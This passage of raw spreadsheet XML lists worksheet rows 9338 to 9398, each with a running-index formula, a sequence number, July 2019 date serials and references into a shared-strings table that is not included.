      </c>
      <c r="D9338" s="1">
        <v>43668</v>
      </c>
      <c r="E9338" t="s">
        <v>18336</v>
      </c>
      <c r="F9338" t="s">
        <v>9975</v>
      </c>
      <c r="G9338" t="s">
        <v>18337</v>
      </c>
    </row>
    <row r="9339" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9339">
        <f t="shared" si="145"/>
        <v>9338</v>
      </c>
      <c r="B9339">
        <v>4338</v>
      </c>
      <c r="C9339" t="s">
        <v>9973</v>
      </c>
      <c r="D9339" s="1">
        <v>43671</v>
      </c>
      <c r="E9339" t="s">
        <v>18338</v>
      </c>
      <c r="F9339" t="s">
        <v>9975</v>
      </c>
      <c r="G9339" t="s">
        <v>18339</v>
      </c>
    </row>
    <row r="9340" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9340">
        <f t="shared" si="145"/>
        <v>9339</v>
      </c>
      <c r="B9340">
        <v>4339</v>
      </c>
      <c r="C9340" t="s">
        <v>9973</v>
      </c>
      <c r="D9340" s="1">
        <v>43668</v>
      </c>
      <c r="E9340" t="s">
        <v>18340</v>
      </c>
      <c r="F9340" t="s">
        <v>9975</v>
      </c>
      <c r="G9340" t="s">
        <v>18341</v>
      </c>
    </row>
    <row r="9341" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9341">
        <f t="shared" si="145"/>
        <v>9340</v>
      </c>
      <c r="B9341">
        <v>4340</v>
      </c>
      <c r="C9341" t="s">
        <v>9973</v>
      </c>
      <c r="D9341" s="1">
        <v>43671</v>
      </c>
      <c r="E9341" t="s">
        <v>18342</v>
      </c>
      <c r="F9341" t="s">
        <v>9975</v>
      </c>
      <c r="G9341" t="s">
        <v>18343</v>
      </c>
    </row>
    <row r="9342" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9342">
        <f t="shared" si="145"/>
        <v>9341</v>
      </c>
      <c r="B9342">
        <v>4341</v>
      </c>
      <c r="C9342" t="s">
        <v>9973</v>
      </c>
      <c r="D9342" s="1">
        <v>43676</v>
      </c>
      <c r="E9342" t="s">
        <v>18344</v>
      </c>
      <c r="F9342" t="s">
        <v>9975</v>
      </c>
      <c r="G9342" t="s">
        <v>18345</v>
      </c>
    </row>
    <row r="9343" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9343">
        <f t="shared" si="145"/>
        <v>9342</v>
      </c>
      <c r="B9343">
        <v>4342</v>
      </c>
      <c r="C9343" t="s">
        <v>9973</v>
      </c>
      <c r="D9343" s="1">
        <v>43668</v>
      </c>
      <c r="E9343" t="s">
        <v>18346</v>
      </c>
      <c r="F9343" t="s">
        <v>9975</v>
      </c>
      <c r="G9343" t="s">
        <v>18347</v>
      </c>
    </row>
    <row r="9344" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9344">
        <f t="shared" si="145"/>
        <v>9343</v>
      </c>
      <c r="B9344">
        <v>4343</v>
      </c>
      <c r="C9344" t="s">
        <v>9973</v>
      </c>
      <c r="D9344" s="1">
        <v>43677</v>
      </c>
      <c r="E9344" t="s">
        <v>18348</v>
      </c>
      <c r="F9344" t="s">
        <v>9975</v>
      </c>
      <c r="G9344" t="s">
        <v>18349</v>
      </c>
    </row>
    <row r="9345" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9345">
        <f t="shared" si="145"/>
        <v>9344</v>
      </c>
      <c r="B9345">
        <v>4344</v>
      </c>
      <c r="C9345" t="s">
        <v>9973</v>
      </c>
      <c r="D9345" s="1">
        <v>43668</v>
      </c>
      <c r="E9345" t="s">
        <v>18350</v>
      </c>
      <c r="F9345" t="s">
        <v>9975</v>
      </c>
      <c r="G9345" t="s">
        <v>18351</v>
      </c>
    </row>
    <row r="9346" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9346">
        <f t="shared" si="145"/>
        <v>9345</v>
      </c>
      <c r="B9346">
        <v>4345</v>
      </c>
      <c r="C9346" t="s">
        <v>9973</v>
      </c>
      <c r="D9346" s="1">
        <v>43672</v>
      </c>
      <c r="E9346" t="s">
        <v>18352</v>
      </c>
      <c r="F9346" t="s">
        <v>9975</v>
      </c>
      <c r="G9346" t="s">
        <v>18353</v>
      </c>
    </row>
    <row r="9347" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9347">
        <f t="shared" ref="A9347:A9410" si="146">+ROW(A9346)</f>
        <v>9346</v>
      </c>
      <c r="B9347">
        <v>4346</v>
      </c>
      <c r="C9347" t="s">
        <v>9973</v>
      </c>
      <c r="D9347" s="1">
        <v>43668</v>
      </c>
      <c r="E9347" t="s">
        <v>18354</v>
      </c>
      <c r="F9347" t="s">
        <v>9975</v>
      </c>
      <c r="G9347" t="s">
        <v>18355</v>
      </c>
    </row>
    <row r="9348" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9348">
        <f t="shared" si="146"/>
        <v>9347</v>
      </c>
      <c r="B9348">
        <v>4347</v>
      </c>
      <c r="C9348" t="s">
        <v>9973</v>
      </c>
      <c r="D9348" s="1">
        <v>43670</v>
      </c>
      <c r="E9348" t="s">
        <v>18356</v>
      </c>
      <c r="F9348" t="s">
        <v>9975</v>
      </c>
      <c r="G9348" t="s">
        <v>18357</v>
      </c>
    </row>
    <row r="9349" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9349">
        <f t="shared" si="146"/>
        <v>9348</v>
      </c>
      <c r="B9349">
        <v>4348</v>
      </c>
      <c r="C9349" t="s">
        <v>9973</v>
      </c>
      <c r="D9349" s="1">
        <v>43673</v>
      </c>
      <c r="E9349" t="s">
        <v>18358</v>
      </c>
      <c r="F9349" t="s">
        <v>10021</v>
      </c>
      <c r="G9349" t="s">
        <v>18359</v>
      </c>
    </row>
    <row r="9350" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9350">
        <f t="shared" si="146"/>
        <v>9349</v>
      </c>
      <c r="B9350">
        <v>4349</v>
      </c>
      <c r="C9350" t="s">
        <v>9973</v>
      </c>
      <c r="D9350" s="1">
        <v>43676</v>
      </c>
      <c r="E9350" t="s">
        <v>18360</v>
      </c>
      <c r="F9350" t="s">
        <v>9975</v>
      </c>
      <c r="G9350" t="s">
        <v>18361</v>
      </c>
    </row>
    <row r="9351" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9351">
        <f t="shared" si="146"/>
        <v>9350</v>
      </c>
      <c r="B9351">
        <v>4350</v>
      </c>
      <c r="C9351" t="s">
        <v>9973</v>
      </c>
      <c r="D9351" s="1">
        <v>43676</v>
      </c>
      <c r="E9351" t="s">
        <v>18362</v>
      </c>
      <c r="F9351" t="s">
        <v>9975</v>
      </c>
      <c r="G9351" t="s">
        <v>18363</v>
      </c>
    </row>
    <row r="9352" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9352">
        <f t="shared" si="146"/>
        <v>9351</v>
      </c>
      <c r="B9352">
        <v>4351</v>
      </c>
      <c r="C9352" t="s">
        <v>9973</v>
      </c>
      <c r="D9352" s="1">
        <v>43672</v>
      </c>
      <c r="E9352" t="s">
        <v>18364</v>
      </c>
      <c r="F9352" t="s">
        <v>9975</v>
      </c>
      <c r="G9352" t="s">
        <v>18365</v>
      </c>
    </row>
    <row r="9353" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9353">
        <f t="shared" si="146"/>
        <v>9352</v>
      </c>
      <c r="B9353">
        <v>4352</v>
      </c>
      <c r="C9353" t="s">
        <v>9973</v>
      </c>
      <c r="D9353" s="1">
        <v>43675</v>
      </c>
      <c r="E9353" t="s">
        <v>18366</v>
      </c>
      <c r="F9353" t="s">
        <v>9975</v>
      </c>
      <c r="G9353" t="s">
        <v>18367</v>
      </c>
    </row>
    <row r="9354" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9354">
        <f t="shared" si="146"/>
        <v>9353</v>
      </c>
      <c r="B9354">
        <v>4353</v>
      </c>
      <c r="C9354" t="s">
        <v>9973</v>
      </c>
      <c r="D9354" s="1">
        <v>43668</v>
      </c>
      <c r="E9354" t="s">
        <v>18368</v>
      </c>
      <c r="F9354" t="s">
        <v>9975</v>
      </c>
      <c r="G9354" t="s">
        <v>18369</v>
      </c>
    </row>
    <row r="9355" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9355">
        <f t="shared" si="146"/>
        <v>9354</v>
      </c>
      <c r="B9355">
        <v>4354</v>
      </c>
      <c r="C9355" t="s">
        <v>9973</v>
      </c>
      <c r="D9355" s="1">
        <v>43673</v>
      </c>
      <c r="E9355" t="s">
        <v>18370</v>
      </c>
      <c r="F9355" t="s">
        <v>9975</v>
      </c>
      <c r="G9355" t="s">
        <v>18371</v>
      </c>
    </row>
    <row r="9356" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9356">
        <f t="shared" si="146"/>
        <v>9355</v>
      </c>
      <c r="B9356">
        <v>4355</v>
      </c>
      <c r="C9356" t="s">
        <v>9973</v>
      </c>
      <c r="D9356" s="1">
        <v>43676</v>
      </c>
      <c r="E9356" t="s">
        <v>18372</v>
      </c>
      <c r="F9356" t="s">
        <v>9975</v>
      </c>
      <c r="G9356" t="s">
        <v>18373</v>
      </c>
    </row>
    <row r="9357" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9357">
        <f t="shared" si="146"/>
        <v>9356</v>
      </c>
      <c r="B9357">
        <v>4356</v>
      </c>
      <c r="C9357" t="s">
        <v>9973</v>
      </c>
      <c r="D9357" s="1">
        <v>43669</v>
      </c>
      <c r="E9357" t="s">
        <v>18374</v>
      </c>
      <c r="F9357" t="s">
        <v>9975</v>
      </c>
      <c r="G9357" t="s">
        <v>18375</v>
      </c>
    </row>
    <row r="9358" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9358">
        <f t="shared" si="146"/>
        <v>9357</v>
      </c>
      <c r="B9358">
        <v>4357</v>
      </c>
      <c r="C9358" t="s">
        <v>9973</v>
      </c>
      <c r="D9358" s="1">
        <v>43670</v>
      </c>
      <c r="E9358" t="s">
        <v>18376</v>
      </c>
      <c r="F9358" t="s">
        <v>9975</v>
      </c>
      <c r="G9358" t="s">
        <v>18377</v>
      </c>
    </row>
    <row r="9359" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9359">
        <f t="shared" si="146"/>
        <v>9358</v>
      </c>
      <c r="B9359">
        <v>4358</v>
      </c>
      <c r="C9359" t="s">
        <v>9973</v>
      </c>
      <c r="D9359" s="1">
        <v>43671</v>
      </c>
      <c r="E9359" t="s">
        <v>18378</v>
      </c>
      <c r="F9359" t="s">
        <v>9975</v>
      </c>
      <c r="G9359" t="s">
        <v>18379</v>
      </c>
    </row>
    <row r="9360" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9360">
        <f t="shared" si="146"/>
        <v>9359</v>
      </c>
      <c r="B9360">
        <v>4359</v>
      </c>
      <c r="C9360" t="s">
        <v>9973</v>
      </c>
      <c r="D9360" s="1">
        <v>43674</v>
      </c>
      <c r="E9360" t="s">
        <v>18380</v>
      </c>
      <c r="F9360" t="s">
        <v>9975</v>
      </c>
      <c r="G9360" t="s">
        <v>18381</v>
      </c>
    </row>
    <row r="9361" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9361">
        <f t="shared" si="146"/>
        <v>9360</v>
      </c>
      <c r="B9361">
        <v>4360</v>
      </c>
      <c r="C9361" t="s">
        <v>9973</v>
      </c>
      <c r="D9361" s="1">
        <v>43670</v>
      </c>
      <c r="E9361" t="s">
        <v>18382</v>
      </c>
      <c r="F9361" t="s">
        <v>9975</v>
      </c>
      <c r="G9361" t="s">
        <v>18383</v>
      </c>
    </row>
    <row r="9362" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9362">
        <f t="shared" si="146"/>
        <v>9361</v>
      </c>
      <c r="B9362">
        <v>4361</v>
      </c>
      <c r="C9362" t="s">
        <v>9973</v>
      </c>
      <c r="D9362" s="1">
        <v>43672</v>
      </c>
      <c r="E9362" t="s">
        <v>18384</v>
      </c>
      <c r="F9362" t="s">
        <v>9975</v>
      </c>
      <c r="G9362" t="s">
        <v>18385</v>
      </c>
    </row>
    <row r="9363" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9363">
        <f t="shared" si="146"/>
        <v>9362</v>
      </c>
      <c r="B9363">
        <v>4362</v>
      </c>
      <c r="C9363" t="s">
        <v>9973</v>
      </c>
      <c r="D9363" s="1">
        <v>43673</v>
      </c>
      <c r="E9363" t="s">
        <v>18386</v>
      </c>
      <c r="F9363" t="s">
        <v>9975</v>
      </c>
      <c r="G9363" t="s">
        <v>18387</v>
      </c>
    </row>
    <row r="9364" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9364">
        <f t="shared" si="146"/>
        <v>9363</v>
      </c>
      <c r="B9364">
        <v>4363</v>
      </c>
      <c r="C9364" t="s">
        <v>9973</v>
      </c>
      <c r="D9364" s="1">
        <v>43671</v>
      </c>
      <c r="E9364" t="s">
        <v>18388</v>
      </c>
      <c r="F9364" t="s">
        <v>9975</v>
      </c>
      <c r="G9364" t="s">
        <v>18389</v>
      </c>
    </row>
    <row r="9365" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9365">
        <f t="shared" si="146"/>
        <v>9364</v>
      </c>
      <c r="B9365">
        <v>4364</v>
      </c>
      <c r="C9365" t="s">
        <v>9973</v>
      </c>
      <c r="D9365" s="1">
        <v>43670</v>
      </c>
      <c r="E9365" t="s">
        <v>18390</v>
      </c>
      <c r="F9365" t="s">
        <v>9975</v>
      </c>
      <c r="G9365" t="s">
        <v>18391</v>
      </c>
    </row>
    <row r="9366" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9366">
        <f t="shared" si="146"/>
        <v>9365</v>
      </c>
      <c r="B9366">
        <v>4365</v>
      </c>
      <c r="C9366" t="s">
        <v>9973</v>
      </c>
      <c r="D9366" s="1">
        <v>43676</v>
      </c>
      <c r="E9366" t="s">
        <v>18392</v>
      </c>
      <c r="F9366" t="s">
        <v>9975</v>
      </c>
      <c r="G9366" t="s">
        <v>18393</v>
      </c>
    </row>
    <row r="9367" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9367">
        <f t="shared" si="146"/>
        <v>9366</v>
      </c>
      <c r="B9367">
        <v>4366</v>
      </c>
      <c r="C9367" t="s">
        <v>9973</v>
      </c>
      <c r="D9367" s="1">
        <v>43669</v>
      </c>
      <c r="E9367" t="s">
        <v>10351</v>
      </c>
      <c r="F9367" t="s">
        <v>9975</v>
      </c>
      <c r="G9367" t="s">
        <v>18394</v>
      </c>
    </row>
    <row r="9368" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9368">
        <f t="shared" si="146"/>
        <v>9367</v>
      </c>
      <c r="B9368">
        <v>4367</v>
      </c>
      <c r="C9368" t="s">
        <v>9973</v>
      </c>
      <c r="D9368" s="1">
        <v>43671</v>
      </c>
      <c r="E9368" t="s">
        <v>18395</v>
      </c>
      <c r="F9368" t="s">
        <v>9975</v>
      </c>
      <c r="G9368" t="s">
        <v>18396</v>
      </c>
    </row>
    <row r="9369" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9369">
        <f t="shared" si="146"/>
        <v>9368</v>
      </c>
      <c r="B9369">
        <v>4368</v>
      </c>
      <c r="C9369" t="s">
        <v>9973</v>
      </c>
      <c r="D9369" s="1">
        <v>43674</v>
      </c>
      <c r="E9369" t="s">
        <v>18397</v>
      </c>
      <c r="F9369" t="s">
        <v>9975</v>
      </c>
      <c r="G9369" t="s">
        <v>18398</v>
      </c>
    </row>
    <row r="9370" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9370">
        <f t="shared" si="146"/>
        <v>9369</v>
      </c>
      <c r="B9370">
        <v>4369</v>
      </c>
      <c r="C9370" t="s">
        <v>9973</v>
      </c>
      <c r="D9370" s="1">
        <v>43671</v>
      </c>
      <c r="E9370" t="s">
        <v>18399</v>
      </c>
      <c r="F9370" t="s">
        <v>9975</v>
      </c>
      <c r="G9370" t="s">
        <v>18400</v>
      </c>
    </row>
    <row r="9371" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9371">
        <f t="shared" si="146"/>
        <v>9370</v>
      </c>
      <c r="B9371">
        <v>4370</v>
      </c>
      <c r="C9371" t="s">
        <v>9973</v>
      </c>
      <c r="D9371" s="1">
        <v>43671</v>
      </c>
      <c r="E9371" t="s">
        <v>18401</v>
      </c>
      <c r="F9371" t="s">
        <v>9975</v>
      </c>
      <c r="G9371" t="s">
        <v>18402</v>
      </c>
    </row>
    <row r="9372" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9372">
        <f t="shared" si="146"/>
        <v>9371</v>
      </c>
      <c r="B9372">
        <v>4371</v>
      </c>
      <c r="C9372" t="s">
        <v>9973</v>
      </c>
      <c r="D9372" s="1">
        <v>43676</v>
      </c>
      <c r="E9372" t="s">
        <v>18403</v>
      </c>
      <c r="F9372" t="s">
        <v>9975</v>
      </c>
      <c r="G9372" t="s">
        <v>18404</v>
      </c>
    </row>
    <row r="9373" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9373">
        <f t="shared" si="146"/>
        <v>9372</v>
      </c>
      <c r="B9373">
        <v>4372</v>
      </c>
      <c r="C9373" t="s">
        <v>9973</v>
      </c>
      <c r="D9373" s="1">
        <v>43674</v>
      </c>
      <c r="E9373" t="s">
        <v>18405</v>
      </c>
      <c r="F9373" t="s">
        <v>9975</v>
      </c>
      <c r="G9373" t="s">
        <v>18406</v>
      </c>
    </row>
    <row r="9374" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9374">
        <f t="shared" si="146"/>
        <v>9373</v>
      </c>
      <c r="B9374">
        <v>4373</v>
      </c>
      <c r="C9374" t="s">
        <v>9973</v>
      </c>
      <c r="D9374" s="1">
        <v>43677</v>
      </c>
      <c r="E9374" t="s">
        <v>18407</v>
      </c>
      <c r="F9374" t="s">
        <v>9975</v>
      </c>
      <c r="G9374" t="s">
        <v>18408</v>
      </c>
    </row>
    <row r="9375" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9375">
        <f t="shared" si="146"/>
        <v>9374</v>
      </c>
      <c r="B9375">
        <v>4374</v>
      </c>
      <c r="C9375" t="s">
        <v>9973</v>
      </c>
      <c r="D9375" s="1">
        <v>43675</v>
      </c>
      <c r="E9375" t="s">
        <v>18409</v>
      </c>
      <c r="F9375" t="s">
        <v>9975</v>
      </c>
      <c r="G9375" t="s">
        <v>18410</v>
      </c>
    </row>
    <row r="9376" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9376">
        <f t="shared" si="146"/>
        <v>9375</v>
      </c>
      <c r="B9376">
        <v>4375</v>
      </c>
      <c r="C9376" t="s">
        <v>9973</v>
      </c>
      <c r="D9376" s="1">
        <v>43674</v>
      </c>
      <c r="E9376" t="s">
        <v>18411</v>
      </c>
      <c r="F9376" t="s">
        <v>9975</v>
      </c>
      <c r="G9376" t="s">
        <v>18412</v>
      </c>
    </row>
    <row r="9377" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9377">
        <f t="shared" si="146"/>
        <v>9376</v>
      </c>
      <c r="B9377">
        <v>4376</v>
      </c>
      <c r="C9377" t="s">
        <v>9973</v>
      </c>
      <c r="D9377" s="1">
        <v>43672</v>
      </c>
      <c r="E9377" t="s">
        <v>18413</v>
      </c>
      <c r="F9377" t="s">
        <v>9975</v>
      </c>
      <c r="G9377" t="s">
        <v>18414</v>
      </c>
    </row>
    <row r="9378" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9378">
        <f t="shared" si="146"/>
        <v>9377</v>
      </c>
      <c r="B9378">
        <v>4377</v>
      </c>
      <c r="C9378" t="s">
        <v>9973</v>
      </c>
      <c r="D9378" s="1">
        <v>43670</v>
      </c>
      <c r="E9378" t="s">
        <v>18415</v>
      </c>
      <c r="F9378" t="s">
        <v>9975</v>
      </c>
      <c r="G9378" t="s">
        <v>18416</v>
      </c>
    </row>
    <row r="9379" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9379">
        <f t="shared" si="146"/>
        <v>9378</v>
      </c>
      <c r="B9379">
        <v>4378</v>
      </c>
      <c r="C9379" t="s">
        <v>9973</v>
      </c>
      <c r="D9379" s="1">
        <v>43671</v>
      </c>
      <c r="E9379" t="s">
        <v>18417</v>
      </c>
      <c r="F9379" t="s">
        <v>9975</v>
      </c>
      <c r="G9379" t="s">
        <v>18418</v>
      </c>
    </row>
    <row r="9380" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9380">
        <f t="shared" si="146"/>
        <v>9379</v>
      </c>
      <c r="B9380">
        <v>4379</v>
      </c>
      <c r="C9380" t="s">
        <v>9973</v>
      </c>
      <c r="D9380" s="1">
        <v>43676</v>
      </c>
      <c r="E9380" t="s">
        <v>18419</v>
      </c>
      <c r="F9380" t="s">
        <v>9975</v>
      </c>
      <c r="G9380" t="s">
        <v>18420</v>
      </c>
    </row>
    <row r="9381" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9381">
        <f t="shared" si="146"/>
        <v>9380</v>
      </c>
      <c r="B9381">
        <v>4380</v>
      </c>
      <c r="C9381" t="s">
        <v>9973</v>
      </c>
      <c r="D9381" s="1">
        <v>43668</v>
      </c>
      <c r="E9381" t="s">
        <v>18421</v>
      </c>
      <c r="F9381" t="s">
        <v>9975</v>
      </c>
      <c r="G9381" t="s">
        <v>18422</v>
      </c>
    </row>
    <row r="9382" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9382">
        <f t="shared" si="146"/>
        <v>9381</v>
      </c>
      <c r="B9382">
        <v>4381</v>
      </c>
      <c r="C9382" t="s">
        <v>9973</v>
      </c>
      <c r="D9382" s="1">
        <v>43674</v>
      </c>
      <c r="E9382" t="s">
        <v>18423</v>
      </c>
      <c r="F9382" t="s">
        <v>9975</v>
      </c>
      <c r="G9382" t="s">
        <v>18424</v>
      </c>
    </row>
    <row r="9383" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9383">
        <f t="shared" si="146"/>
        <v>9382</v>
      </c>
      <c r="B9383">
        <v>4382</v>
      </c>
      <c r="C9383" t="s">
        <v>9973</v>
      </c>
      <c r="D9383" s="1">
        <v>43669</v>
      </c>
      <c r="E9383" t="s">
        <v>18425</v>
      </c>
      <c r="F9383" t="s">
        <v>9975</v>
      </c>
      <c r="G9383" t="s">
        <v>18426</v>
      </c>
    </row>
    <row r="9384" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9384">
        <f t="shared" si="146"/>
        <v>9383</v>
      </c>
      <c r="B9384">
        <v>4383</v>
      </c>
      <c r="C9384" t="s">
        <v>9973</v>
      </c>
      <c r="D9384" s="1">
        <v>43675</v>
      </c>
      <c r="E9384" t="s">
        <v>18427</v>
      </c>
      <c r="F9384" t="s">
        <v>9975</v>
      </c>
      <c r="G9384" t="s">
        <v>18428</v>
      </c>
    </row>
    <row r="9385" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9385">
        <f t="shared" si="146"/>
        <v>9384</v>
      </c>
      <c r="B9385">
        <v>4384</v>
      </c>
      <c r="C9385" t="s">
        <v>9973</v>
      </c>
      <c r="D9385" s="1">
        <v>43668</v>
      </c>
      <c r="E9385" t="s">
        <v>18429</v>
      </c>
      <c r="F9385" t="s">
        <v>9975</v>
      </c>
      <c r="G9385" t="s">
        <v>18430</v>
      </c>
    </row>
    <row r="9386" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9386">
        <f t="shared" si="146"/>
        <v>9385</v>
      </c>
      <c r="B9386">
        <v>4385</v>
      </c>
      <c r="C9386" t="s">
        <v>9973</v>
      </c>
      <c r="D9386" s="1">
        <v>43672</v>
      </c>
      <c r="E9386" t="s">
        <v>18431</v>
      </c>
      <c r="F9386" t="s">
        <v>9975</v>
      </c>
      <c r="G9386" t="s">
        <v>18432</v>
      </c>
    </row>
    <row r="9387" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9387">
        <f t="shared" si="146"/>
        <v>9386</v>
      </c>
      <c r="B9387">
        <v>4386</v>
      </c>
      <c r="C9387" t="s">
        <v>9973</v>
      </c>
      <c r="D9387" s="1">
        <v>43672</v>
      </c>
      <c r="E9387" t="s">
        <v>18433</v>
      </c>
      <c r="F9387" t="s">
        <v>9975</v>
      </c>
      <c r="G9387" t="s">
        <v>18434</v>
      </c>
    </row>
    <row r="9388" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9388">
        <f t="shared" si="146"/>
        <v>9387</v>
      </c>
      <c r="B9388">
        <v>4387</v>
      </c>
      <c r="C9388" t="s">
        <v>9973</v>
      </c>
      <c r="D9388" s="1">
        <v>43671</v>
      </c>
      <c r="E9388" t="s">
        <v>18435</v>
      </c>
      <c r="F9388" t="s">
        <v>9975</v>
      </c>
      <c r="G9388" t="s">
        <v>18436</v>
      </c>
    </row>
    <row r="9389" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9389">
        <f t="shared" si="146"/>
        <v>9388</v>
      </c>
      <c r="B9389">
        <v>4388</v>
      </c>
      <c r="C9389" t="s">
        <v>9973</v>
      </c>
      <c r="D9389" s="1">
        <v>43676</v>
      </c>
      <c r="E9389" t="s">
        <v>18437</v>
      </c>
      <c r="F9389" t="s">
        <v>9975</v>
      </c>
      <c r="G9389" t="s">
        <v>18438</v>
      </c>
    </row>
    <row r="9390" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9390">
        <f t="shared" si="146"/>
        <v>9389</v>
      </c>
      <c r="B9390">
        <v>4389</v>
      </c>
      <c r="C9390" t="s">
        <v>9973</v>
      </c>
      <c r="D9390" s="1">
        <v>43673</v>
      </c>
      <c r="E9390" t="s">
        <v>18439</v>
      </c>
      <c r="F9390" t="s">
        <v>9975</v>
      </c>
      <c r="G9390" t="s">
        <v>18440</v>
      </c>
    </row>
    <row r="9391" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9391">
        <f t="shared" si="146"/>
        <v>9390</v>
      </c>
      <c r="B9391">
        <v>4390</v>
      </c>
      <c r="C9391" t="s">
        <v>9973</v>
      </c>
      <c r="D9391" s="1">
        <v>43677</v>
      </c>
      <c r="E9391" t="s">
        <v>18441</v>
      </c>
      <c r="F9391" t="s">
        <v>9975</v>
      </c>
      <c r="G9391" t="s">
        <v>18442</v>
      </c>
    </row>
    <row r="9392" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9392">
        <f t="shared" si="146"/>
        <v>9391</v>
      </c>
      <c r="B9392">
        <v>4391</v>
      </c>
      <c r="C9392" t="s">
        <v>9973</v>
      </c>
      <c r="D9392" s="1">
        <v>43674</v>
      </c>
      <c r="E9392" t="s">
        <v>18443</v>
      </c>
      <c r="F9392" t="s">
        <v>9975</v>
      </c>
      <c r="G9392" t="s">
        <v>18444</v>
      </c>
    </row>
    <row r="9393" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9393">
        <f t="shared" si="146"/>
        <v>9392</v>
      </c>
      <c r="B9393">
        <v>4392</v>
      </c>
      <c r="C9393" t="s">
        <v>9973</v>
      </c>
      <c r="D9393" s="1">
        <v>43675</v>
      </c>
      <c r="E9393" t="s">
        <v>18445</v>
      </c>
      <c r="F9393" t="s">
        <v>9975</v>
      </c>
      <c r="G9393" t="s">
        <v>18446</v>
      </c>
    </row>
    <row r="9394" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9394">
        <f t="shared" si="146"/>
        <v>9393</v>
      </c>
      <c r="B9394">
        <v>4393</v>
      </c>
      <c r="C9394" t="s">
        <v>9973</v>
      </c>
      <c r="D9394" s="1">
        <v>43673</v>
      </c>
      <c r="E9394" t="s">
        <v>18447</v>
      </c>
      <c r="F9394" t="s">
        <v>10526</v>
      </c>
      <c r="G9394" t="s">
        <v>18448</v>
      </c>
    </row>
    <row r="9395" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9395">
        <f t="shared" si="146"/>
        <v>9394</v>
      </c>
      <c r="B9395">
        <v>4394</v>
      </c>
      <c r="C9395" t="s">
        <v>9973</v>
      </c>
      <c r="D9395" s="1">
        <v>43673</v>
      </c>
      <c r="E9395" t="s">
        <v>18449</v>
      </c>
      <c r="F9395" t="s">
        <v>9975</v>
      </c>
      <c r="G9395" t="s">
        <v>18450</v>
      </c>
    </row>
    <row r="9396" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9396">
        <f t="shared" si="146"/>
        <v>9395</v>
      </c>
      <c r="B9396">
        <v>4395</v>
      </c>
      <c r="C9396" t="s">
        <v>9973</v>
      </c>
      <c r="D9396" s="1">
        <v>43671</v>
      </c>
      <c r="E9396" t="s">
        <v>18451</v>
      </c>
      <c r="F9396" t="s">
        <v>9975</v>
      </c>
      <c r="G9396" t="s">
        <v>18452</v>
      </c>
    </row>
    <row r="9397" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9397">
        <f t="shared" si="146"/>
        <v>9396</v>
      </c>
      <c r="B9397">
        <v>4396</v>
      </c>
      <c r="C9397" t="s">
        <v>9973</v>
      </c>
      <c r="D9397" s="1">
        <v>43672</v>
      </c>
      <c r="E9397" t="s">
        <v>18453</v>
      </c>
      <c r="F9397" t="s">
        <v>9975</v>
      </c>
      <c r="G9397" t="s">
        <v>18454</v>
      </c>
    </row>
    <row r="9398" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9398">
        <f t="shared" si="146"/>
        <v>9397</v>
      </c>
      <c r="B9398">
        <v>4397</v>
      </c>
      <c r="C9398" t="s">
        <v>9973</v>
      </c>
      <c r="D9398" s="1">
        <v>43668</v>
      </c>
      <c r="E9398" t="s">
        <v>18455</v>
      </c>
      <c r="F9398" t="s">
        <v>9975</v>
      </c>
      <c r="G9398" t="s">
        <v>18456</v>
      </c>
    </row>
    <row r="9399" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9399">
        <f t="shared" si="146"/>
        <v>9398</v>
      </c>
      <c r="B9399">
        <v>4398</v>
